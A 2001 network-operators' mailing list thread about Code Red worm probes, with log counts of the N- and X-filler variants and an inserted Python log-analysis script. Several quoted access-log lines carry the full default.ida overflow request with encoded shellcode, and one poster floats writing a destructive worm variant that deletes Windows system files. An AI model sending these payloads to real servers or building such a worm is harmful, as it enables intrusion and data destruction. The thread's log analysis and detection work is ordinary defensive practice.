Code Red Hammering Away

My little Class C seems to be getting 3-6 attempts per second to
connect to Port 80 on various IPs at the present time. Is this
about average?

-=[L]=-

Hello Lou,

It's more than what I am getting. Nevertheless, since this started again
I'm seeing a lot more attempts than in July.

Michael...

Yes, it's true, I fixed the attribution. Young whippersnappers!

michael@aplatform.com wrote:

> > My little Class C seems to be getting 3-6 attempts per second to
> > connect to Port 80 on various IPs at the present time. Is this
> > about average?

> It's more than what I am getting. Nevertheless, since this started again
> I'm seeing a lot more attempts than in July.

I see about 300% more attempts than in July, but close to one-third of
those do not appear to be code red. They seem to be what I would have
suspected. People trying to mask attempts under the noise of code red.
Nonetheless, it is getting annoying enough that I am close to moving all
the windoze machines off to a private switched network until this is over.

No, I'm not afraid of them being compromised, but some of them do seem to
be getting hit harder than the rest of my computers. What I don't
understand is why my openbsd laptop attracts so much attention.

uname -a shows OpenBSD scorpion 2.6 GENERIC#696 i386, hardly an attractive
target for code red in my book. No, it's not running a web server. The only
service it actually offers is sshd.

At first it was interesting, then annoying, now it's just boring. Most of
the non-code red attempts I see are from APNIC, for what that's worth.

Hello Etaoin,

> Yes, it's true, I fixed the attribution. Young whippersnappers!
>
> > > My little Class C seems to be getting 3-6 attempts per second to
> > > connect to Port 80 on various IPs at the present time. Is this
> > > about average?
>
> > It's more than what I am getting. Nevertheless, since this started again
> > I'm seeing a lot more attempts than in July.
>
> I see about 300% more attempts than in July, but close to one-third of
> those do not appear to be code red. They seem to be what I would have
> suspected. People trying to mask attempts under the noise of code red.
> Nonetheless, it is getting annoying enough that I am close to moving all
> the windoze machines off to a private switched network until this is over.

I can see they are "valid" CR attempts.

I also noticed requests that use "XXXXXXXXX" instead of "NNNNNNNNNN". In
fact I see more X's than N's as of this morning.

Grisha

Hello,

Very interesting. I'm seeing the NNNNNNNNNNNNNNNNNNNN's as it was in July.

Michael...

N's versus X's on a server with a block of 5 IP's as of August 1, 4AM EDT:

4:53:42pm|melange@host:/home/melange> grep default.ida /var/log/httpd-access.log | grep NNNNN|wc -l
     436
4:53:48pm|melange@host:/home/melange> grep default.ida /var/log/httpd-access.log | grep XXXXX | wc -l
       6

Bob,

I guess they will get around to me as I don't show any XXX. Only a hundred
or so NNNN.

Michael...

I've started seeing LOTS of XXXXX hits as of approx 1 hour ago.
5 in one hour and counting...

Checking back the first XXXX one I saw was about 9 hours ago, since then
the number of XXXX and NNNN accesses has been about even. Actually
checking other logs I would say XXX accesses are the majority (over 80%)
in the last 4 or 5 hours.

I would guess a better version, perhaps it deletes the old Code Red copy
when it infects a machine which enables it to grow so fast.

Just for reference, here's the logs of this new variant:

211.194.55.233 - - [04/Aug/2001:11:52:42 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281 "-" "-"
213.57.146.75 - - [04/Aug/2001:14:38:06 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 282 "-" "-"
202.110.201.18 - - [04/Aug/2001:14:46:37 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 273 "-" "-"
200.203.173.193 - - [04/Aug/2001:15:25:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276 "-" "-"
user-v3qslgs.biz.mindspring.com - - [04/Aug/2001:15:40:06 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276 "-" "-"
202.106.106.190 - - [04/Aug/2001:15:57:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 735 "-" "-"

Note that the earliest one hit at 11:52 today...
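A way to do the N-versus-X count from earlier in the thread over a whole log rather than with two greps, as an added example that is not code from anyone in this thread: it parses Apache combined-format lines, classifies each default.ida probe by the character its filler run is made of, and breaks the counts out per hour and per source host, with a third bucket for probes whose filler is some other character, the kind of request the thread asks subscribers to watch for. The sample log lines are constructed for the example: the %u-encoded tail is copied from the log lines quoted above, while the source addresses (documentation ranges), timestamps and filler lengths are made up.

```python
import re
from collections import Counter, defaultdict

# Constructed access-log lines in Apache combined format. The request shape
# copies the default.ida probes quoted in the thread; the addresses,
# timestamps and filler lengths are made up for this example.
FILLER_N = "N" * 224
FILLER_X = "X" * 224
FILLER_A = "A" * 224   # a filler that is neither N nor X
TAIL = ("%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3"
        "%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")

SAMPLE_LOG = "\n".join([
    f'192.0.2.10 - - [04/Aug/2001:11:52:42 -0400] "GET /default.ida?{FILLER_X}{TAIL} HTTP/1.0" 404 281 "-" "-"',
    f'192.0.2.11 - - [04/Aug/2001:12:03:09 -0400] "GET /default.ida?{FILLER_N}{TAIL} HTTP/1.0" 404 281 "-" "-"',
    f'198.51.100.7 - - [04/Aug/2001:12:15:31 -0400] "GET /default.ida?{FILLER_X}{TAIL} HTTP/1.0" 404 282 "-" "-"',
    f'198.51.100.7 - - [04/Aug/2001:13:41:05 -0400] "GET /default.ida?{FILLER_X}{TAIL} HTTP/1.0" 404 282 "-" "-"',
    # A probe whose filler is some other character: goes in the "other" bucket.
    f'203.0.113.5 - - [04/Aug/2001:13:59:58 -0400] "GET /default.ida?{FILLER_A}{TAIL} HTTP/1.0" 404 280 "-" "-"',
    # Ordinary traffic, which must not be counted at all.
    '203.0.113.9 - - [04/Aug/2001:14:00:12 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"',
])

# Apache combined log format: host ident user [timestamp] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Filler run: one letter or digit repeated; whatever follows it is the tail.
FILLER_RE = re.compile(r'^(?P<filler>(?P<ch>[A-Za-z0-9])(?P=ch)*)(?P<tail>.*)$')
PROBE_PREFIX = "/default.ida?"


def classify_request(path):
    """Classify one request path.

    Returns None for anything that is not a default.ida probe, otherwise
    (variant, filler_length, tail) where variant is "N-variant",
    "X-variant" or "other" (a filler of some other character, or none).
    """
    if not path.startswith(PROBE_PREFIX):
        return None
    query = path[len(PROBE_PREFIX):]
    m = FILLER_RE.match(query)
    if not m:
        return ("other", 0, query)
    variant = {"N": "N-variant", "X": "X-variant"}.get(m.group("ch"), "other")
    return (variant, len(m.group("filler")), m.group("tail"))


def summarize(log_text):
    """Count default.ida probes per variant, per hour and per source host."""
    by_variant = Counter()
    by_hour = Counter()
    by_source = defaultdict(Counter)
    tails = Counter()
    skipped = 0
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            skipped += 1           # malformed line: count it, don't drop it silently
            continue
        probe = classify_request(m.group("path"))
        if probe is None:
            continue               # ordinary request
        variant, filler_len, tail = probe
        by_variant[variant] += 1
        hour = m.group("ts")[:14]  # "04/Aug/2001:11" -> one bucket per hour
        by_hour[(hour, variant)] += 1
        by_source[m.group("host")][variant] += 1
        tails[tail] += 1           # distinct %u tails hint at distinct payloads
    return {
        "by_variant": dict(by_variant),
        "by_hour": dict(by_hour),
        "by_source": {h: dict(c) for h, c in by_source.items()},
        "tails": dict(tails),
        "skipped_lines": skipped,
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    for variant, n in sorted(report["by_variant"].items()):
        print(f"{variant:10s} {n}")
    for (hour, variant), n in sorted(report["by_hour"].items()):
        print(f"{hour} {variant:10s} {n}")
    for host, counts in sorted(report["by_source"].items()):
        print(host, counts)
```

Run it against a real access log by passing the file contents to `summarize()`; the per-hour breakdown is what shows the point at which the X-variant overtakes the N-variant, and the per-source counts show which hosts keep coming back.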

On Sat, Aug 04, 2001 at 05:14:09PM -0400, Bob K wrote:

> > 4:53:48pm|melange@host:/home/melange> grep default.ida /var/log/httpd-access.log | grep XXXXX | wc -l
> > 6
>
> I've started seeing LOTS of XXXXX hits as of approx 1 hour ago.
> 5 in one hour and counting...

> Just for reference, here's the logs of this new variant:

Pretty interesting, maybe all nanog-post subscribers could share their
experience with this worm too. Especially if you've seen a lot of non-[XN]
alphanumerical chars.

Sorry, but this worm caused more damages to mailing lists than anything
else, on the Internet. Looks more like a chain-letter...

Speaking of sharing experiences, it is beating the crap out of our Unix
servers. We installed application firewalls on all the NT machines, and they were
patched anyway before the last one hit. But all the requests to port 80
are taking down the webserver and affecting the machine because of the access
logs.

bummer. :(

Yup, I'm seeing the XXXX's now. :((
Another round??

Michael...

Sameh Ghane wrote:

> Sorry, but this worm caused more damages to mailing lists than anything
> else, on the Internet. Looks more like a chain-letter...

Dunno why you would think this was other than operational. As a small
provider serving almost entirely dial-up, we still have enough of this
to swamp almost entirely all of our outbound links. And as soon as
we kill them, they pop up on another IP. The support costs are going
to hurt, bad.

Inbound isn't too bad, I guess CEF and WFQ works to protect individual
machines from overload at T1 rates.

We won't have much of an attack problem on our own machines, as we are
a Macintosh/Linux/OpenBSD shop. We have only 2 Windows machines to
train tech support....

Meanwhile, the SirCam worm is eating disk space, and we have folks
calling because it takes too long to download their mail, or the POP
session fails entirely (another M$ problem with large messages).
The support costs are hurting on this, too.

It seems to me that somebody needs to write a version of Code Red that
wipes all .exe and .dll in the windows directory, forcing an update
of both windows and office.

Anybody game?

I've got 18 with XXXXX's and 38 with NNNNNNN's, and that was with my web
server down for part of the day.

Regards,